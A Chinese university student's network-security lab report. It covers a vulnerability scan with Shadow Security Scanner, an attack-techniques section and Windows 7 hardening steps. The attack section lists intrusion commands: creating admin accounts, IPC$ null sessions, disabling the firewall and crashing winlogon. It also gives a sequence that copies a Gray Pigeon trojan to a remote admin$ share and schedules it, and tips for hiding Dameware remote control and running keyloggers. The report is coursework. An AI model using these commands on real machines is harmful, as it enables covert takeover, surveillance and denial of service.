网络安全综合实验3 4 5实验.docx
- 文档编号:4672983
- 上传时间:2022-12-07
- 格式:DOCX
- 页数:22
- 大小:2MB
网络安全综合实验3 4 5实验.docx
《网络安全综合实验3 4 5实验.docx》由会员分享,可在线阅读,更多相关《网络安全综合实验3 4 5实验.docx(22页珍藏版)》请在冰豆网上搜索。
网络安全综合实验345实验
科技学院
综合实验报告
(2012--2013年度第1学期)
名称:
网络信息安全综合实验
题目:
网络信息安全综合实验
院系:
信息工程
班级:
网络09K2
学号:
091909030202
学生姓名:
陈浩
指导教师:
李莉朵春红
设计周数:
1
成绩:
日期:
2012年12月27日
网络信息安全综合实验(_______________________________________________________________________________________________________________________________
任务书
一、目的与要求
根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上,能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各类安全问题,维护网络及操作系统的安全。
二、主要内容
实验一对称密码算法DES的实现
对称密码算法是数据加密常用的一种方法,具有算法公开、加密效率高等特点,也是密码学研究的基础,其中的典型代表当属DES。
实验二非对称密码算法RSA的实现
非对称密码算法在密钥管理、数字签名等领域起着重要的作用,其基于难解的数学问题而提出,具有公私钥对,密钥分配简单而且安全,其中典型的代表当属RSA。
实验三综合扫描及安全评估
利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从而提高系统的安全性能。
实验四网络攻防技术
矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地解决各种威胁。
实验五Windows系统安全配置方案
作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往忽视了OS的安全性。
其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方面。
除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵检测软件来加强系统的安全。
鉴于学时有限,要求实验一和实验二选作其一,实验三至实验五必做。
学生可单独一组,也可两人一组,但各自完成不同的模块,且整体难度应有所增加。
其中实验一(或实验二)要求编程实现,可直接调用相关功能函数完成。
实验三至实验五可在机房的网络信息安全综合实验系统上完成。
三、进度计划
序号
设计(实验)内容
完成时间
备注
1
接受任务,查阅文献,开始实现密码算法
第一天
2
完成密码算法编程
第二天
3
上午完成综合扫描及安全评估实验,下午进行网络攻防实验
第三天
4
上午完成网络攻防实验,下午进行系统安全配置实验
第四天
5
上午完成系统安全配置实验,下午提交实验报告并验收
第五天
四、实验成果要求
1.要求程序能正常运行,并实现任务书要求功能。
2.完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重对设计思路的归纳和对问题解决过程的总结。
五、考核方式
平时成绩+程序验收+实验报告。
学生姓名:
指导教师:
李莉朵春红
2012年12月24日
实验三综合扫描及安全评估
一、实验目的和要求
1、运用理论课所学网络扫描的相关知识,使用SSS进行漏洞扫描,并对结果报告进行系统的弱点分析。
2、掌握在Windows环境下安装配置网络综合扫描工具SSS,扫描局域网内另一台主机的方法。
3、掌握在SSS中配置扫描策略、自定义扫描策略界面、生成扫描结果并对扫描结果进行分析以发现被扫描系统的漏洞的方法。
二、实验环境(实验设备)
硬件:
两台计算机(Lenovo和华硕笔记本)
软件:
ShadowSecurityScanner(sss--流光)
注释:
sss是一款非常专业的安全漏洞扫描软件,这是一款超级扫描工具,能扫描服务器各种漏洞,包括很多漏洞扫描、账号扫描、DOS扫描...
操作系统:
win7
三、实验原理及内容
使用两台电脑,用网线连接,在一台机器上监听另外一台主机。
被监听主机操作系统为win7。
关闭win7自带防火墙才可以进行这个实验。
下图为实验刚开始时候的截图
打开sss这个软件,界面如下
用鼠标点击scanner命令,在新的命令窗口选择completescan即下图高亮部分。
添加ip地址为192.168.18.5的主机进行扫描
选择高亮192.168.18.5主机选择下一步
按startscan进行扫描
扫描完成
通过建立与NT主机空会话,入侵者甚至可以争取到一个重命名管理员账号。
这是由于即使空会话被添加了每组的持续连接时间.这个期限内每组是这样做的主机不是在域还可以使用MS网络浏览器的功能
建立一个空会话在WindowsNT上打开了各种安全漏洞,但是可以很容易地阻止。
通过设置注册表,匿名连接限制。
注册表定位到HKLM\System\CurrentControlSet\Control\LsaName:
RestrictAnonymousTypeREG_DWORDvalue:
1虽然这并没有对这种特定的代码进行测试,它已经过测试,对其他信息收集,利用空连接到IPC$与此注册表。
设置enabied,你仍然可以连接到IPC$,但不能获得关于这个域的任何进一步的资料。
四、实验小结
装这款软件必须屏蔽掉防火墙,找一根还挺结实的网线,然后鼠标点点就可以了。
还是宿舍的电脑好,主频高,所以扫描的速度快很多。
但请在扫描别做什么事情,否则扫描时间会变的很长很长。
所以对什么都得抱有耐心,这样才可以获得你想要的结果。
实验四网络攻防技术
一、实验目的和要求
矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地解决各种威胁。
二、实验原理及内容
1、常用入侵命令
netuser用户名密码/add(建立用户)
netlocalgroupadministrators用户名密码/add(将用户加到管理员,使其拥有管理权限)
netuserguest/active:
Yes(激活guest用户)
netuserguest12345(修改guest密码为12345)
netuser(查看账号属性)
netuse\\ip\ipc$“”/user(建立空IPC连接)
netuse\\ip\ipc$“密码”/user:
“用户名”(建立IPC非空连接,非空链接就是需要帐户和密码)
netuse\\ip\ipc$/del(删除IPC空连接)
netusez:
\\127.0.0.1\c$(映射目标主机磁盘c盘到本地磁盘Z盘)
netstart(查看开启了哪些服务)
netstart服务名(开启服务)
nettime\\目标IP(查看对方时间)
netview(查看局域网中开启了哪些共享)
netshare(查看本地开启的哪些共享)
netshareC$/del(删除C盘默认共享)
netstat-an(查看计算机开放了哪些端口)
Copyxx.exe\\ip\admin$\System32(将当前xx.exe复制到对方Admin$共享的System32目录内)
scconfigtlnesvrstart=auto(修改telnet服务的启动方式为自动,auto前面有一个空格)
netstopsharedaccess(关闭系统自带的防火墙)
netsendIP消息(利用messenger服务向目标IP发送消息)
ntsd-cq-pnwinlogon.exe(蓝屏重启)
ntsd-cq-pncsrss.exe(死机)
tasklist(查看进程)
taskkill(结束进程)
2、纯DOS命令入侵
netuse\\192.168.2.20\ipc$“123”/user:
”administrator”
nettime\\192.168.2.20
Copyc:
\server.exe\\192.168.2.20\admin$\svchost.exe
At\\192.168.2.2012:
00startc:
\windows\svchost.exe
这样,对方就中了灰鸽子服务端了。
3、图形界面入侵
1)计算机管理
操作菜单→连接到另一台计算机
2)注册表编辑器
文件菜单→连接网络注册表
3)第三方工具比如Dameware、Pcanywhere
4、Dameware的隐藏
用Dameware控制对方,要做到悄无声息,需要注意以下几点:
1)点帮助菜单à激活软件,输入注册码注册软件;
2)在远程连接对话框上单击“设置”,勾选:
“查看模式”和“显示远程鼠标指针”;
3)切换到“安装选项”选项卡,勾选上“复制配置文件”然后点“编辑”:
把“附加设置”选项卡上“允许托盘图标”勾掉
再把“通知对话”选项卡上“连接时通知”勾掉。
5、灰鸽子
以华夏灰鸽子2009为例,注意事项:
IP地址栏一定要填写自己的IP地址,而且不要忘了加上冒号和端口号
6、PcShare
7、键盘记录
以“keyghost”和“简单键盘记录程序”为例
实验五Windows系统安全配置方案
一、实验目的和要求
作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往忽视了OS的安全性。
其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方面。
除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵检测软件来加强系统的安全。
二、实验原理及内容
1、四个重要安全设置要设好
1)打补丁,设置安全级别,这些功能在XP和VISTA中都有,Windows7的这一系列功能更加丰富。
补丁的选择更加多样,安全级别设置也分成了四个等级(VISTA只有开启和关闭),还提供了自动播放控制以及加强的反间谍工具,让系统自身更加安全。
第一步:
进入控制面板,单击“系统和安全”按钮,再单击WindowsUpdate按钮进入自动更新,单击“检查更新”按钮会自动连接到微软的官方网站,对系统进行检测,稍后会列出所有的计算机更新,单击“安装更新”按钮自动下载安装系统更新。
第二步:
单击“更改设置”按钮,选择“重要更新”下的“检查更新,但是让我选择是否下载和安装更新”,在下方还可以设置安装新的更新的时间,最后单击“确定”按钮即可。
这样以后有了更新时,系统会提示我们下载安装。
2)提升系统的安全级别
WindowsVista开始,微软引入了用户账户控制功能(UserAccountControl),简称UAC。
我们可以根据需要设置UAC的安全级别,从而相应提升系统的安全级别。
单击“开始”按钮,在“搜索框”中输入UAC后按回车键,打开“用户帐户控制设置”窗口,这里提供了4种级别的安全防护,拖动滑块至最顶端,这是最安全的设置,在程序对计算机或Windows设置进行更改(需要管理员权限)之前,系统会发出通知,并且桌面会变暗。
只有接受或拒绝UAC对话框中的请求,才能在计算机上执行其他操作。
变暗的桌面称为安全桌面,其他程序在桌面变暗时无法运行。
3)按需设置自动播放功能
Windows自带的系统自动播放功能,可以自动执行某些操作(如:
自动播放光盘、影片等)。
虽然这样会比较方便,但是也带来了安全隐患,我们可以有针对性地进行设置,按需使用自动播放功能。
进入控制面板,单击“硬件和声音”选项,再单击“自动播放”按钮打开对话框,取消选择“为所有媒体和设备使用自动播放”选项,下面列举着所有的媒体,单击后面的下拉菜单可选择执行的操作,如:
不执行操作、每次都询问等,最后单击“保存”按钮即可。
4)让流氓软件无处“藏”
为了防止用户收到间谍软件、流氓工具的侵害,Windows7中集成了免费的反间谍工具——Windowsdefender。
Windowsdefender提供了两种保护电脑的方式:
扫描和实时保护。
下面我们就用Windowsdefender对系统进行检测,让流氓软件无处藏身。
第一步:
单击“开始”菜单,在“搜索框”中输入Windowsdefender后按回车键即可打开该工具,单击“立即检查更新”按钮可对Windowsdefender的病毒库进行升级,从而便于查杀最新的恶意软件。
第二步:
单击“扫描”按钮选择“快速扫描”可对系统进行快速检查,选择“完全扫描”会对系统进行全面的检测,所用时间也会大幅度增加。
大家扫描结束后如果有流氓软件则会出现警告框,选中后单击“全部删除”按钮即可。
第三步:
单击“工具”切换到“工具和设置”选项,单击“选项”出现对话框,在“自动扫描”中可设置自动扫描计算机的频率、时间和类型,在“默认操作”中可对各种警报级别进行自动处理(删除或隔离)在下方还可以选择实时保护的对象。
在“实时保护”中可设置自动扫描下载的文件和附件,扫描计算机上运行的程序。
2、加强网络安全设置,IE9升级防护新功能
如今网络是各种病毒传播的最常见的途径,这几年网络钓鱼、网页挂马之类的手段层出不穷,让人很难招架。
Windows7中关于网络安全的设置也非常丰富。
自带的IE8提供了多种安全防护功能,系统防火墙也进行了升级,更加好用。
1)开启IE9的安全防护
浏览器是我们上网的主要途径,大部分病毒都是通过浏览器而来,在Windows7中默认内置了InternetExplorer9.0浏览器(简称IE9),安全性得到了大幅度提升,不过要想保护IE9.0浏览器的安全,常用的设置还是不可或缺的。
a)全面清理个人隐私
浏览网页的过程中,会在地址栏留下网址、历史记录中会有网站地址、某些用户名和密码会保留在Cookie中,这些都会泄露你的个人隐私,因此必须进行清理。
打开IE9后,选择菜单“工具→Internet选项”,切换到“常规”,单击“浏览历史记录”下的“删除”按钮出现对话框,然后选择要删除的项目(如:
Internet临时文件、Cookie、表单数据等),再单击“删除”按钮即可删除。
如果感觉每次都要手动删除比较麻烦的话,可选择“浏览历史记录”下的“退出时删除浏览历史记录”,这样上网后关闭IE,浏览记录也会自动清除。
b)远离“网络钓鱼”
听说过“网络钓鱼”吗?
最简单的例子:
有不法分子模仿真实的银行网站做了个一模一样的,然后通过邮件或其他方式骗你登录并输入银行账号和密码,结果……——这就是最典型的“钓鱼网站”,也叫仿冒网站。
当然可不只这一种方式,还有更多你根本想不到、感觉不到的危机正在慢慢的逼近……现在不要怕了!
IE8可以通过各种方式来帮助我们,避免误入险境,步步为营反钓鱼!
第一步:
某些网站的网址看起来是没有问题,但是由于网络技术的发展,谁也不能保证看到的就是真实的,常用的方法就是跨站攻击,而开启XSS筛选器功能即可避免此类攻击。
选择菜单“工具→Internet选项”,切换到“安全”选项,单击“自定义级别”按钮,将“脚本”下的“启用XSS筛选器”选择“启用”,默认情况下是启用的。
第二步:
为了尽可能避免恶意网站的攻击,IE9.0自带的SmartScreen筛选器,可将当前网址与微软数据库中的网址进行比对,一旦发现而已网站就会弹出警告。
单击工具栏上的“安全→SmartScreen筛选器→打开SmartScreen筛选器…”,默认情况下该功能也是启用的。
如果在上网时发现恶意网站,可选择“报告不安全网站”,将恶意网站上报到微软数据库,避免其他人上当。
c)插件全方位管理
不可否认,很多插件可以增强IE的功能,但总有些插件会给IE带来安全隐患,从而有可能波及到我们的整个系统。
因此加强插件的管理是非常重要的。
选择菜单“工具→管理加载项”出现对话框,单击“工具栏和扩展”选项,在这里可以看到IE中的各种插件,对于不需要的插件选中后,单击下方的“禁用”按钮即可。
2)用好系统自带防火墙
从WindowsXp开始就内置了防火墙,但是却一直被大家所忽视。
在Windows7中,防火墙得到了加强,普通用户足以使用它抵御外部攻击,当系统中有软件试图连接网络时,防火墙就会弹出“Windows安全警报”窗口,给系统加上第一道“防护网”。
第一步:
进入控制面板,单击“系统和安全”按钮切换窗口,再单击“Windows防火墙”即可进入防火墙设置界面。
单击左侧的“允许程序或功能通过Windows防火墙”出现对话框,可查看本机上哪些程序或功能会连接到网络,取消选择某个程序则会禁止其连接到网络。
如果需要的连接网络的程序在没有出现在列表中,可单击“允许运行另一程序…”,然后选择相应程序的启动文件即可。
第二步:
单击“更改通知设置”按钮,在这里可设置阻止所有的程序连接到网络。
单击“打开或关闭Windows防火墙”按钮可选择关闭或打开Windows的防火墙,如果使用了第三方防火墙,可关闭Windows防火墙。
单击“还原默认”按钮,可将Windows的防火墙还原到初始状态。
3)共享资源拒绝“外泄”
处在局域网中的电脑,为了资源使用方便,常常会设置共享。
在Windows7中开启了网络发现后,不仅便于发现网络中的其他共享资源,同时也将自己暴露在共用网络中,因此在长时间无需资源共享时,最好暂时关闭网络发现功能。
进入控制面板,单击“网络和Internet”按钮切换窗口,再单击“网络和共享中心”按钮进入设置中心,单击“更改高级共享设置”出现对话框,选择“网络发现”下的“关闭网络发现”,最后单击“保存修改”按钮即可。
三、实验总结
通过本次的上机实验,对网络安全这门课程有一个更深一步的解,在学习理论基础的同时,也要增强自己的实际动手能力,这次实验我也着实又感受了维护网络安全的乐趣,从中也学到了不少知识。
在本次的实验中,我深刻体会到了维护网络安全的重要性。
了解在自己在维护网络安全的道路上,还有很长的路要走,只有知己知彼才能百战百胜。
这次实验中我也出现过一些比较严重的错误。
后来在老师的指点和同学的帮助下改正了自己的错误,最后也收获很多。
我会继续我的兴趣关注维护网络安全的,相信在越来越多的尝试之后,自己的水平会不断进步不断提高的。
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 网络安全综合实验3 5实验 网络安全 综合 实验